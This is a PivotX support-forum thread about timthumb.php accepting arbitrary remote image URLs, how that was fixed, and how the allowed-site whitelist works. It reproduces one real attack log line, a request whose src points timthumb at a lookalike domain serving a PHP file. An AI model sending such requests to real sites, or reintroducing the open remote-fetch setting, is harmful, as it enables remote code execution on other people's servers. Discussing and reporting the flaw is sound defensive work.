PivotX Support Community

[mskala]

The file pivotx/includes/timthumb.php , which is used for making thumbnails of images, accepts the URL of the image to thumbnail as a query variable. Although the script includes code to check that the specified URL is local, or on a whitelist of allowed URLs, this code is disabled by default. There's a line that says "$allow_remote_all = true;", and as a result, it will accept any URL the user specifies and attempt to download an image from that URL. This could be exploited, for instance, for spamming (the URL could be one that attempts to post a comment to another site); or to attack the local site by attempting to exploit buffer overflows, etc., in the image-parsing library. Downloading remote images this way, if it's ever allowed, certainly shouldn't be allowed by default; and the setting is not user-configurable but hardcoded in the script.

[hansfn]

Hi and thanks for posting.

I do understand some of your concerns, and I will discuss it with Bob - who just recently enabled/allowed remote images. Unluckily it's not easy to control this using a PivotX config setting since timthumb.php is standalone.

This could be exploited, for instance, for spamming (the URL could be one that attempts to post a comment to another site);

Since timthumb.php does a get request for the image, this is very, very, very unlikely (and you know why). However,

or to attack the local site by attempting to exploit buffer overflows, etc., in the image-parsing library.

is a scary and much more likely problem.

[hansfn]

FYI: We no longer allow remote images by default - changed in revision 2729.

[scoude]

Since timthumb.php does a get request for the image, this is very, very, very unlikely (and you know why). However,

Hi,

I just have a hacker using my site with PivotX using this vulnerability ...

[cut by hansfn]

[hansfn]

This was fixed in PivotX 2.3.0 - did you upgrade?

If you think a similar bug is present in 2.3.0, contact me directly at hansfn@pivotx.net - never disclose such details openly in the forum. Thx

PS! This is a very old thread and your vulnerability isn't the same as the issue discussed in this thread (even if it's related).

[winters]

according to the host I got a problem with

91.227.5.10 - - [17/May/2016:19:39:57 -0400] "GET /pivotx/includes/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.dwell.kz%2Fpetx.php HTTP/1.1" 200 15544 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

pivotx 2.3.11

does someone know if this can be correct?

thanks!

[hansfn]

No, the default configuration of timthumb.php does not allow fetching from files from img.youtube.com.dwell.kz, only img.youtube.com (and other trusted hosts - see the $ALLOWED_SITES variable).

So, if your host claims that your timthumb.php misbehaves, you have either not updated the file when updating PivotX (it should say "This is timthumb version 2.8.4 - r200" in the beginning of the file) or you have set ALLOW_ALL_EXTERNAL_SITES to true either in timthumb-config.php or in timthumb.php

NB! The fact that some one tries to attack your timthumb.php doesn't prove or say that there is a vulnerability.

[winters]

thank you hans